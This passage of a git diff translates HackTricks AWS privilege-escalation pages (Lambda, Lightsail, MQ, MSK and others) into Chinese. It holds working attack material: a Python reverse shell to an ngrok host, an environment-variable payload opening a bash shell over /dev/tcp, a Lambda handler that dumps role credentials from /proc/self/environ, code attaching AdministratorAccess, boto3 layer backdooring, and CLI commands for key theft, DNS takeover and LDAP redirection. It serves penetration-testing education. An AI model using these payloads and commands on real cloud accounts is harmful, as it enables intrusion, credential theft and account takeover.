+s.connect(('4.tcp.ngrok.io',14305)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(['/bin/sh','-i']) +time.sleep(900) +return 0 ``` ```bash @@ -37,8 +36,8 @@ zip "rev.zip" "rev.py" # Create the function aws lambda create-function --function-name my_function \ - --runtime python3.9 --role \ - --handler rev.lambda_handler --zip-file fileb://rev.zip +--runtime python3.9 --role \ +--handler rev.lambda_handler --zip-file fileb://rev.zip # Invoke the function aws lambda invoke --function-name my_function output.txt @@ -47,99 +46,83 @@ aws lambda invoke --function-name my_function output.txt # List roles aws iam list-attached-user-policies --user-name ``` - -You could also **abuse the lambda role permissions** from the lambda function itself.\ -If the lambda role had enough permissions you could use it to grant admin rights to you: - +您还可以**滥用lambda角色权限**来自lambda函数本身。\ +如果lambda角色具有足够的权限,您可以使用它授予您管理员权限: ```python import boto3 def lambda_handler(event, context): - client = boto3.client('iam') - response = client.attach_user_policy( - UserName='my_username', - PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' - ) - return response +client = boto3.client('iam') +response = client.attach_user_policy( +UserName='my_username', +PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' +) +return response ``` - -It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda. - +也可以在不需要外部连接的情况下泄露lambda的角色凭证。这对于用于内部任务的**网络隔离的Lambdas**将非常有用。如果有未知的安全组过滤您的反向shell,这段代码将允许您直接泄露凭证作为lambda的输出。 ```python def handler(event, context): -    sessiontoken = open('/proc/self/environ', "r").read() -    return { -        'statusCode': 200, -        'session': str(sessiontoken) -    } +sessiontoken = open('/proc/self/environ', "r").read() +return { +'statusCode': 200, +'session': str(sessiontoken) +} ``` ```bash aws lambda invoke --function-name output.txt cat output.txt ``` - -**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. 
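If you use the network-isolated variant above, the role credentials come back inside the Lambda's JSON response. A minimal sketch of pulling them out of `output.txt` and reusing them locally: the three variable names are the standard ones the Lambda runtime sets, but exactly how the NUL separators of `/proc/self/environ` end up encoded depends on how the response is serialized:
```bash
# The NUL separators usually show up as \u0000 escapes in the JSON response
sed 's/\\u0000/\n/g' output.txt | grep -E 'AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)='

# Reuse the leaked values from your own machine and confirm which role you now act as
export AWS_ACCESS_KEY_ID=<leaked value>
export AWS_SECRET_ACCESS_KEY=<leaked value>
export AWS_SESSION_TOKEN=<leaked value>
aws sts get-caller-identity
```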
+**潜在影响:** 直接提升到指定的任意 lambda 服务角色。 > [!CAUTION] -> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` +> 请注意,即使看起来很有趣,**`lambda:InvokeAsync`** **并不**允许单独**执行 `aws lambda invoke-async`**,你还需要 `lambda:InvokeFunction` -### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission` - -Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`** +### `iam:PassRole`,`lambda:CreateFunction`,`lambda:AddPermission` +与之前的场景一样,如果你拥有权限 **`lambda:AddPermission`**,你可以**授予自己 `lambda:InvokeFunction`** 权限。 ```bash # Check the previous exploit and use the following line to grant you the invoke permissions aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \ - --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN" +--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN" ``` - -**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. +**潜在影响:** 直接提升到指定的任意 Lambda 服务角色。 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping` -Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\ -They can create a **Lambda function with malicious code and assign it an existing IAM role**. - -Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role. +拥有 **`iam:PassRole`、`lambda:CreateFunction` 和 `lambda:CreateEventSourceMapping`** 权限的用户(可能还包括 `dynamodb:PutItem` 和 `dynamodb:CreateTable`)可以间接 **提升权限**,即使没有 `lambda:InvokeFunction`。\ +他们可以创建一个 **带有恶意代码的 Lambda 函数并将其分配给现有的 IAM 角色**。 +用户可以设置或利用现有的 DynamoDB 表,将其通过事件源映射链接到 Lambda,而不是直接调用 Lambda。此设置确保在表中新增项时,Lambda 函数会 **自动触发**,无论是通过用户的操作还是其他进程,从而间接调用 Lambda 函数并以传递的 IAM 角色的权限执行代码。 ```bash aws lambda create-function --function-name my_function \ - --runtime python3.8 --role \ - --handler lambda_function.lambda_handler \ - --zip-file fileb://rev.zip +--runtime python3.8 --role \ +--handler lambda_function.lambda_handler \ +--zip-file fileb://rev.zip ``` - -If DynamoDB is already active in the AWS environment, the user only **needs to establish the event source mapping** for the Lambda function. 
However, if DynamoDB isn't in use, the user must **create a new table** with streaming enabled: - +如果DynamoDB在AWS环境中已经激活,用户只需**为Lambda函数建立事件源映射**。然而,如果DynamoDB未在使用中,用户必须**创建一个新的表**并启用流: ```bash aws dynamodb create-table --table-name my_table \ - --attribute-definitions AttributeName=Test,AttributeType=S \ - --key-schema AttributeName=Test,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES +--attribute-definitions AttributeName=Test,AttributeType=S \ +--key-schema AttributeName=Test,KeyType=HASH \ +--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ +--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES ``` - -Now it's posible **connect the Lambda function to the DynamoDB table** by **creating an event source mapping**: - +现在可以通过**创建事件源映射**来**将Lambda函数连接到DynamoDB表**: ```bash aws lambda create-event-source-mapping --function-name my_function \ - --event-source-arn \ - --enabled --starting-position LATEST +--event-source-arn \ +--enabled --starting-position LATEST ``` - -With the Lambda function linked to the DynamoDB stream, the attacker can **indirectly trigger the Lambda by activating the DynamoDB stream**. This can be accomplished by **inserting an item** into the DynamoDB table: - +通过将 Lambda 函数链接到 DynamoDB 流,攻击者可以 **通过激活 DynamoDB 流间接触发 Lambda**。这可以通过 **向 DynamoDB 表中插入一个项目** 来实现: ```bash aws dynamodb put-item --table-name my_table \ - --item Test={S="Random string"} +--item Test={S="Random string"} ``` - -**Potential Impact:** Direct privesc to the lambda service role specified. +**潜在影响:** 直接提升到指定的 lambda 服务角色。 ### `lambda:AddPermission` -An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource): - +拥有此权限的攻击者可以 **授予自己(或他人)任何权限** (这会生成基于资源的策略以授予对资源的访问): ```bash # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode) aws lambda add-permission --function-name --statement-id asdasd --action '*' --principal arn: @@ -147,71 +130,62 @@ aws lambda add-permission --function-name --statement-id asdasd --ac # Invoke the function aws lambda invoke --function-name /tmp/outout ``` - -**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it. +**潜在影响:** 直接提升权限到通过授予修改代码和运行它的权限的 lambda 服务角色。 ### `lambda:AddLayerVersionPermission` -An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information - +拥有此权限的攻击者可以**授予自己(或其他人)权限 `lambda:GetLayerVersion`**。他可以访问该层并搜索漏洞或敏感信息。 ```bash # Give everyone the permission lambda:GetLayerVersion aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion ``` - -**Potential Impact:** Potential access to sensitive information. +**潜在影响:** 可能访问敏感信息。 ### `lambda:UpdateFunctionCode` -Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\ -The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**. 
- -Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code. +持有 **`lambda:UpdateFunctionCode`** 权限的用户有可能 **修改与 IAM 角色关联的现有 Lambda 函数的代码。**\ +攻击者可以 **修改 Lambda 的代码以提取 IAM 凭证**。 +尽管攻击者可能没有直接调用该函数的能力,但如果 Lambda 函数是预先存在并且正在运行的,那么它很可能会通过现有的工作流或事件被触发,从而间接促进修改后代码的执行。 ```bash # The zip should contain the lambda code (trick: Download the current one and add your code there) aws lambda update-function-code --function-name target_function \ - --zip-file fileb:///my/lambda/code/zipped.zip +--zip-file fileb:///my/lambda/code/zipped.zip # If you have invoke permissions: aws lambda invoke --function-name my_function output.txt # If not check if it's exposed in any URL or via an API gateway you could access ``` - -**Potential Impact:** Direct privesc to the lambda service role used. +**潜在影响:** 直接提升到使用的 lambda 服务角色。 ### `lambda:UpdateFunctionConfiguration` -#### RCE via env variables - -With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands: +#### 通过环境变量进行 RCE +凭借这些权限,可以添加环境变量,这将导致 Lambda 执行任意代码。例如,在 Python 中,可以利用环境变量 `PYTHONWARNING` 和 `BROWSER` 使 Python 进程执行任意命令: ```bash aws --profile none-priv lambda update-function-configuration --function-name --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}" ``` - -For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in: +对于其他脚本语言,还有其他环境变量可以使用。有关更多信息,请查看以下内容中脚本语言的子部分: {{#ref}} https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse {{#endref}} -#### RCE via Lambda Layers +#### 通过 Lambda Layers 进行 RCE -[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**. - -Inside lambda you can check the paths from where python code is loaded with a function like the following: +[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 允许在您的 Lambda 函数中包含 **代码**,但 **单独存储**,因此函数代码可以保持小巧,并且 **多个函数可以共享代码**。 +在 Lambda 内部,您可以使用以下函数检查加载 Python 代码的路径: ```python import json import sys def lambda_handler(event, context): - print(json.dumps(sys.path, indent=2)) +print(json.dumps(sys.path, indent=2)) ``` - -These are the places: +这些地方是: 1. /var/task 2. /opt/python/lib/python3.7/site-packages @@ -224,73 +198,61 @@ These are the places: 9. /opt/python/lib/python3.7/site-packages 10. /opt/python -For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position). +例如,库 boto3 是从 `/var/runtime/boto3` 加载的(第 4 个位置)。 -#### Exploitation +#### 利用 -It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. 
To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there. - -For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library: +可以滥用权限 `lambda:UpdateFunctionConfiguration` 来 **添加一个新层** 到一个 lambda 函数。要执行任意代码,这个层需要包含一些 **lambda 将要导入的库。** 如果你能读取 lambda 的代码,你可以很容易找到这一点,还要注意,lambda **可能已经在使用一个层**,你可以 **下载** 这个层并 **在其中添加你的代码**。 +例如,假设 lambda 正在使用库 boto3,这将创建一个包含库最新版本的本地层: ```bash pip3 install -t ./lambda_layer boto3 ``` +您可以打开 `./lambda_layer/boto3/__init__.py` 并 **在全局代码中添加后门**(例如,一个用于提取凭据或获取反向 shell 的函数)。 -You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example). - -Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\ -Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:** - +然后,将 `./lambda_layer` 目录压缩并 **在您自己的账户中上传新的 lambda 层**(或在受害者的账户中,但您可能没有权限这样做)。\ +请注意,您需要创建一个 python 文件夹并将库放在其中以覆盖 /opt/python/boto3。此外,层需要与 lambda 使用的 **python 版本兼容**,如果您将其上传到您的账户,它需要位于 **同一区域:** ```bash aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" ``` - -Now, make the uploaded lambda layer **accessible by any account**: - +现在,使上传的 lambda 层 **对任何账户可访问**: ```bash aws lambda add-layer-version-permission --layer-name boto3 \ - --version-number 1 --statement-id public \ - --action lambda:GetLayerVersion --principal * +--version-number 1 --statement-id public \ +--action lambda:GetLayerVersion --principal * ``` - -And attach the lambda layer to the victim lambda function: - +并将 lambda 层附加到受害者 lambda 函数: ```bash aws lambda update-function-configuration \ - --function-name \ - --layers arn:aws:lambda:::layer:boto3:1 \ - --timeout 300 #5min for rev shells +--function-name \ +--layers arn:aws:lambda:::layer:boto3:1 \ +--timeout 300 #5min for rev shells ``` +下一步要么是**自己调用函数**,如果可以的话,要么是等待**它被正常方式调用**——这是更安全的方法。 -The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method. - -A **more stealth way to exploit this vulnerability** can be found in: +**利用此漏洞的更隐蔽方式**可以在以下内容中找到: {{#ref}} ../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md {{#endref}} -**Potential Impact:** Direct privesc to the lambda service role used. +**潜在影响:** 直接提升到使用的lambda服务角色。 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl` -Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do! +也许拥有这些权限你能够创建一个函数并通过调用URL执行它……但我找不到测试的方法,所以如果你找到,请告诉我! 
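An untested sketch of how that combination could presumably be chained, in line with the caveat above. The function name is illustrative; note that exposing the URL publicly with `--auth-type NONE` normally also requires a resource-based policy (i.e. `lambda:AddPermission`), which is not in this permission set, so the `AWS_IAM` variant is shown and the request is signed with a SigV4-capable client such as `awscurl`:
```bash
# 1. Create the function with the target role attached (reusing rev.zip from the earlier examples)
aws lambda create-function --function-name url_func \
--runtime python3.9 --role <lambda-role-arn> \
--handler rev.lambda_handler --zip-file fileb://rev.zip

# 2. Expose it through a Function URL protected by IAM auth
aws lambda create-function-url-config --function-name url_func --auth-type AWS_IAM

# 3. Call the returned FunctionUrl with a signed request (the call that lambda:InvokeFunctionUrl authorizes)
awscurl --service lambda -X POST '<FunctionUrl>'
```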
### Lambda MitM -Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in: +一些lambda将会**接收用户在参数中发送的敏感信息。** 如果在其中一个中获得RCE,你可以提取其他用户发送给它的信息,查看: {{#ref}} ../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md {{#endref}} -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md index 1bf78eb3c..6a2488865 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md @@ -4,112 +4,93 @@ ## Lightsail -For more information about Lightsail check: +有关 Lightsail 的更多信息,请查看: {{#ref}} ../aws-services/aws-lightsail-enum.md {{#endref}} > [!WARNING] -> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. +> 重要的是要注意,Lightsail **不使用属于用户的 IAM 角色**,而是使用 AWS 管理的账户,因此您无法利用此服务进行特权提升。然而,**敏感数据**如代码、API 密钥和数据库信息可能会在此服务中找到。 ### `lightsail:DownloadDefaultKeyPair` -This permission will allow you to get the SSH keys to access the instances: - +此权限将允许您获取访问实例的 SSH 密钥: ``` aws lightsail download-default-key-pair ``` - -**Potential Impact:** Find sensitive info inside the instances. +**潜在影响:** 在实例中查找敏感信息。 ### `lightsail:GetInstanceAccessDetails` -This permission will allow you to generate SSH keys to access the instances: - +此权限将允许您生成 SSH 密钥以访问实例: ```bash aws lightsail get-instance-access-details --instance-name ``` - -**Potential Impact:** Find sensitive info inside the instances. +**潜在影响:** 在实例中查找敏感信息。 ### `lightsail:CreateBucketAccessKey` -This permission will allow you to get a key to access the bucket: - +此权限将允许您获取访问存储桶的密钥: ```bash aws lightsail create-bucket-access-key --bucket-name ``` - -**Potential Impact:** Find sensitive info inside the bucket. +**潜在影响:** 在存储桶中查找敏感信息。 ### `lightsail:GetRelationalDatabaseMasterUserPassword` -This permission will allow you to get the credentials to access the database: - +此权限将允许您获取访问数据库的凭据: ```bash aws lightsail get-relational-database-master-user-password --relational-database-name ``` - -**Potential Impact:** Find sensitive info inside the database. +**潜在影响:** 在数据库中找到敏感信息。 ### `lightsail:UpdateRelationalDatabase` -This permission will allow you to change the password to access the database: - +此权限将允许您更改访问数据库的密码: ```bash aws lightsail update-relational-database --relational-database-name --master-user-password ``` - -If the database isn't public, you could also make it public with this permissions with - +如果数据库不是公开的,您也可以通过这些权限将其公开。 ```bash aws lightsail update-relational-database --relational-database-name --publicly-accessible ``` - -**Potential Impact:** Find sensitive info inside the database. 
+**潜在影响:** 在数据库中查找敏感信息。 ### `lightsail:OpenInstancePublicPorts` -This permission allow to open ports to the Internet - +此权限允许将端口开放到互联网。 ```bash aws lightsail open-instance-public-ports \ - --instance-name MEAN-2 \ - --port-info fromPort=22,protocol=TCP,toPort=22 +--instance-name MEAN-2 \ +--port-info fromPort=22,protocol=TCP,toPort=22 ``` - -**Potential Impact:** Access sensitive ports. +**潜在影响:** 访问敏感端口。 ### `lightsail:PutInstancePublicPorts` -This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it. - +此权限允许将端口开放到互联网。请注意,此调用将关闭未在其上指定的任何已打开端口。 ```bash aws lightsail put-instance-public-ports \ - --instance-name MEAN-2 \ - --port-infos fromPort=22,protocol=TCP,toPort=22 +--instance-name MEAN-2 \ +--port-infos fromPort=22,protocol=TCP,toPort=22 ``` - -**Potential Impact:** Access sensitive ports. +**潜在影响:** 访问敏感端口。 ### `lightsail:SetResourceAccessForBucket` -This permissions allows to give an instances access to a bucket without any extra credentials - +此权限允许实例在没有任何额外凭据的情况下访问存储桶。 ```bash aws set-resource-access-for-bucket \ - --resource-name \ - --bucket-name \ - --access allow +--resource-name \ +--bucket-name \ +--access allow ``` - -**Potential Impact:** Potential new access to buckets with sensitive information. +**潜在影响:** 可能新获得对包含敏感信息的存储桶的访问权限。 ### `lightsail:UpdateBucket` -With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone: - +通过此权限,攻击者可以授予自己的 AWS 账户对存储桶的读取访问权限,甚至可以将存储桶公开给所有人: ```bash # Grant read access to exterenal account aws update-bucket --bucket-name --readonly-access-accounts @@ -120,47 +101,36 @@ aws update-bucket --bucket-name --access-rules getObject=public,allowPub # Bucket private but single objects can be public aws update-bucket --bucket-name --access-rules getObject=private,allowPublicOverrides=true ``` - -**Potential Impact:** Potential new access to buckets with sensitive information. +**潜在影响:** 可能新获得对包含敏感信息的存储桶的访问。 ### `lightsail:UpdateContainerService` -With this permissions an attacker could grant access to private ECRs from the containers service - +通过此权限,攻击者可以授予对容器服务的私有 ECR 的访问权限。 ```bash aws update-container-service \ - --service-name \ - --private-registry-access ecrImagePullerRole={isActive=boolean} +--service-name \ +--private-registry-access ecrImagePullerRole={isActive=boolean} ``` - -**Potential Impact:** Get sensitive information from private ECR +**潜在影响:** 从私有 ECR 获取敏感信息 ### `lightsail:CreateDomainEntry` -An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. - +拥有此权限的攻击者可以创建子域并将其指向自己的 IP 地址(子域接管),或制作一个 SPF 记录,使其能够伪造来自该域的电子邮件,甚至将主域设置为自己的 IP 地址。 ```bash aws lightsail create-domain-entry \ - --domain-name example.com \ - --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +--domain-name example.com \ +--domain-entry name=dev.example.com,type=A,target=192.0.2.0 ``` - -**Potential Impact:** Takeover a domain +**潜在影响:** 接管一个域名 ### `lightsail:UpdateDomainEntry` -An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. 
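As for the SPF-spoofing variant that both of these domain-entry permissions mention, a hypothetical TXT record authorizing an attacker IP to send mail for the domain could look like this (the inner double quotes around the TXT value are usually required and tend to be the fiddly part; `create-domain-entry` takes the same shape):
```bash
# Overwrite an SPF TXT record so mail from an attacker-controlled IP passes SPF checks
aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry '{"name":"example.com","type":"TXT","target":"\"v=spf1 ip4:192.0.2.0 +all\""}'
```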
- +拥有此权限的攻击者可以创建子域并将其指向自己的IP地址(子域接管),或制作一个SPF记录,使其能够伪造来自该域名的电子邮件,甚至将主域名设置为自己的IP地址。 ```bash aws lightsail update-domain-entry \ - --domain-name example.com \ - --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +--domain-name example.com \ +--domain-entry name=dev.example.com,type=A,target=192.0.2.0 ``` - -**Potential Impact:** Takeover a domain +**潜在影响:** 接管一个域名 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md index a1004bde6..d3d6bf545 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md @@ -4,26 +4,18 @@ ### `mediapackage:RotateChannelCredentials` -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - +更改频道的第一个 IngestEndpoint 的用户名和密码。 (此 API 已被 RotateIngestEndpointCredentials 替代) ```bash aws mediapackage rotate-channel-credentials --id ``` - ### `mediapackage:RotateIngestEndpointCredentials` -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - +更改频道的第一个 IngestEndpoint 的用户名和密码。 (此 API 已弃用,用于 RotateIngestEndpointCredentials) ```bash aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 ``` - -## References +## 参考 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md index 80890e389..e8c35abb4 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md @@ -4,7 +4,7 @@ ## MQ -For more information about MQ check: +有关MQ的更多信息,请查看: {{#ref}} ../aws-services/aws-mq-enum.md @@ -12,42 +12,32 @@ For more information about MQ check: ### `mq:ListBrokers`, `mq:CreateUser` -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - +拥有这些权限,您可以**在ActimeMQ代理中创建新用户**(这在RabbitMQ中无效): ```bash aws mq list-brokers aws mq create-user --broker-id --console-access --password --username ``` - -**Potential Impact:** Access sensitive info navigating through ActiveMQ +**潜在影响:** 通过 ActiveMQ 访问敏感信息 ### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - +拥有这些权限后,您可以 **在 ActiveMQ 代理中创建新用户**(这在 RabbitMQ 中无效): ```bash aws mq list-brokers aws mq list-users --broker-id aws mq update-user --broker-id --console-access --password --username ``` - -**Potential Impact:** Access sensitive info navigating through ActiveMQ +**潜在影响:** 通过 ActiveMQ 访问敏感信息 ### `mq:ListBrokers`, `mq:UpdateBroker` -If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. 
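A more concrete sketch of that reconfiguration: the metadata field names below follow the `UpdateBroker` API, the host and DN values are purely illustrative, and the new LDAP settings are generally only applied once the broker reboots:
```bash
# Point the broker's LDAP integration at an attacker-controlled server so that the
# service-account bind and user lookups leak to it (all values are placeholders)
aws mq update-broker --broker-id <broker-id> \
--ldap-server-metadata '{"Hosts":["attacker.example.com"],"ServiceAccountUsername":"cn=admin,dc=corp,dc=local","ServiceAccountPassword":"Password1!","UserBase":"ou=users,dc=corp,dc=local","UserSearchMatching":"(uid={0})","RoleBase":"ou=groups,dc=corp,dc=local","RoleSearchMatching":"(member=uid={1})"}'

# The change normally takes effect on the next reboot / maintenance window
aws mq reboot-broker --broker-id <broker-id>
```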
- +如果一个代理使用 **LDAP** 进行授权与 **ActiveMQ**。攻击者可以 **更改** 用于 **的 LDAP 服务器的配置** 为 **一个由攻击者控制的**。这样攻击者将能够 **窃取所有通过 LDAP 发送的凭据**。 ```bash aws mq list-brokers aws mq update-broker --broker-id --ldap-server-metadata=... ``` +如果你能以某种方式找到 ActiveMQ 使用的原始凭据,你可以执行 MitM,窃取凭据,在原始服务器中使用它们,并发送响应(也许只是重用被窃取的凭据你就可以做到这一点)。 -If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). - -**Potential Impact:** Steal ActiveMQ credentials +**潜在影响:** 窃取 ActiveMQ 凭据 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md index f0538785f..82bc38bf6 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md @@ -4,7 +4,7 @@ ## MSK -For more information about MSK (Kafka) check: +有关 MSK (Kafka) 的更多信息,请查看: {{#ref}} ../aws-services/aws-msk-enum.md @@ -12,17 +12,11 @@ For more information about MSK (Kafka) check: ### `msk:ListClusters`, `msk:UpdateSecurity` -With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. - +拥有这些 **权限** 和 **对 kafka 代理所在 VPC 的访问**,您可以添加 **无身份验证** 以访问它们。 ```bash aws msk --client-authentication --cluster-arn --current-version ``` - -You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ -If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. +您需要访问 VPC,因为 **您无法启用公开暴露的 Kafka 的 None 认证**。如果它是公开暴露的,如果使用 **SASL/SCRAM** 认证,您可以 **读取秘密** 以访问(您将需要额外的权限来读取秘密)。\ +如果使用 **基于 IAM 角色的认证** 并且 **Kafka 是公开暴露的**,您仍然可以滥用这些权限以获得访问权限。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md index 7d43bbd3b..9e0bcff55 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md @@ -4,19 +4,15 @@ ## Organizations -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-organizations-enum.md {{#endref}} -## From management Account to children accounts +## 从管理账户到子账户 -If you compromise the root/management account, chances are you can compromise all the children accounts.\ -To [**learn how check this page**](../#compromising-the-organization). 
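As a quick illustration of that pivot (the role name below is just the default that Organizations creates in member accounts it provisions, so it may have been renamed or removed):
```bash
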